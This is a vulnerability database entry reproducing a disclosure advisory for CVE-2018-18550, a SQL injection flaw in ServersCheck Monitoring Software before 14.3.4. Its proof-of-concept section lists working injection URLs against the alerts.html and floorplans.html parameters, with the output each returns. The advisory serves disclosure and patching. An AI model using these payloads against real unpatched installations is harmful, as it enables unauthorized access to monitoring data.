ServersCheck Monitoring Software SQL Injection Vulnerability

Vulnerability ID: 1364762
Vulnerability Type: SQL Injection
Published: 2018-10-29
Updated: 2018-10-29
CVE ID: CVE-2018-18550
CNNVD-ID: CNNVD-201810-1115
Platform: N/A
CVSS Score: N/A
|Vulnerability Source
https://cxsecurity.com/issue/WLB-2018100243
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-201810-1115
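|Vulnerability Details
ServersCheck Monitoring Software is a browser-based network monitoring tool from ServersCheck of Belgium. The tool monitors and reports on system performance and reliability problems and raises alerts. A SQL injection vulnerability exists in ServersCheck Monitoring Software versions prior to 14.3.4. A remote attacker can exploit this vulnerability to execute arbitrary SQL commands.
|Exploit (EXP)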
[+] Credits: John Page (aka hyp3rlinx)		
[+] Website: hyp3rlinx.altervista.org
[+] Source:  http://hyp3rlinx.altervista.org/advisories/CVE-2018-18550-SERVERSCHECK-MONITORING-SOFTWARE-SQL-INJECTION.txt
[+] ISR: ApparitionSec          
 
Greetz: indoushka | Eduardo B.


[Vendor]
www.serverscheck.com


[Product]
ServersCheck Monitoring Software - through 14.3.3

Software for monitoring your edge computing infrastructure, network & servers.

http://downloads.serverscheck.com/monitoring_software/setup.exe
File hash: b7bffe4fc83b6a4586c099d6c62d8eeb



[Vulnerability Type]
SQL Injection



[CVE Reference]
CVE-2018-18550


[Security Issue]
ServersCheck Monitoring Software allows for SQL Injection by an authenticated user via the alerts.html "id" parameter.



[References]
https://serverscheck.com/monitoring-software/release.asp



[Exploit/POC]
http://127.0.0.1:1272/alerts.html?id=18391

Result:
Alerts History for SENSORXY
No data available in table

Then using 'OR+2=2,

http://127.0.0.1:1272/alerts.html?id=18391+'OR+2=2+--+

Result:

Alerts History for test
155 	a day ago 	CPU on 127.0.0.1 	Status Change 	DOWN to OK 	
154 	a day ago 	CPU on 127.0.0.1 	Status Change 	OK to DOWN 	
153 	a day ago 	test 	Status Change 	OK to DOWN 	Unable to connect to host


SQL Injection - original page results successfully manipulated using 18391-2
-----------------------------------------------------------------------------

Examples:

http://127.0.0.1:1272/alerts.html?id=18391
No data available in table

Then using 34 minus 2,

http://127.0.0.1:1272/alerts.html?id=18391-2
153 	a day ago 	test 	Status Change 	OK to DOWN 	Unable to connect to host

and minus 1,

http://127.0.0.1:1272/alerts.html?id=18391-1
155 	a day ago 	CPU on 127.0.0.1 	Status Change 	DOWN to OK 	
154 	a day ago 	CPU on 127.0.0.1 	Status Change 	OK to DOWN


http://127.0.0.1:1272/floorplans.html?floorplan=34
Floor Plan PLANXY

Then using 34 minus 2,

http://127.0.0.1:1272/floorplans.html?floorplan=34-2
Floor Plan 0 



[Network Access]
Remote



[Severity]
High


[Disclosure Timeline]
Vendor Notification: October 6, 2018
Vendor acknowledgement: October 7, 2018
Vendor release v14.3.4 : October 7th, 2018 
CVE assigned by Mitre: October 21, 2018
October 22, 2018 : Public Disclosure



[+] Disclaimer
The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise.
Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and
that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit
is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility
for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information
or exploits by the author or elsewhere. All content (c).

hyp3rlinx
|References

Source: serverscheck.com

Link: https://serverscheck.com/monitoring-software/release.asp